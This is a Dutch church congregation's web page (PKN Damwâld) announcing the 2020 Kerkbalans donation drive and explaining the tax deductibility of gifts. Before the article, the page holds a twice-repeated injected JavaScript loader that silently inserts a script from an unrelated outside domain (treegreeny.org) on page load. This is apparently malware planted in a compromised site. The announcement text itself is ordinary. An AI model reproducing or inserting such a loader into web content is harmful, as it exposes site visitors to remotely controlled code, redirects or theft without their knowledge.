;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Actie Kerkbalans weer van start - PKN Damwâld

Actie Kerkbalans weer van start

Gepubliceerd op: zaterdag 11 januari 2020

Mijn kerk inspireert, helpt, bidt, deelt, rouwt of viert! Welk woord zou u in willen vullen? Of kiest u liever voor “een kerk is van blijvende waarde” of “een kerk is heel wat waard”. Zomaar wat thema’s van de actie Kerkbalans van de afgelopen jaren. Het thema voor dit jaar is: “Geef voor je Kerk”. In onze Hervormde Gemeente en Gereformeerde Kerk gaat de actie Kerkbalans in januari 2020 weer volop van start. De landelijke actie loopt van 18 januari t/m 1 februari. Alle gemeenteleden krijgen een brief met het verzoek om een bijdrage voor de kerk te geven. De kerk krijgt zoals u weet geen subsidies en is dus volledig afhankelijk van de financiële bijdragen van betrokken kerkleden, van mensen zoals u. Is de kerk voor u ook een plek van ontmoeting en inspiratie? We hopen van harte dat u meedoet aan de actie Kerkbalans. Dankzij uw bijdrage kunnen we onze belangrijke taken blijven vervullen. De antwoordformulieren worden door de “lopers” voor 1 februari weer bij u opgehaald.
Wij willen u hierbij ook nog even wijzen op de mogelijkheid om een periodieke gift te geven. Uw gift aan de kerk en diaconie is onder bepaalde voorwaarden aftrekbaar van de belasting. Dit geldt voor al uw giften boven de 1% (minimaal € 60) en tot een maximum van 10% van uw verzamelinkomen. Maar die grenzen gelden niet voor een periodieke gift.

De colleges van kerkrentmeesters van de Hervormde Gemeente en de Gereformeerde Kerk.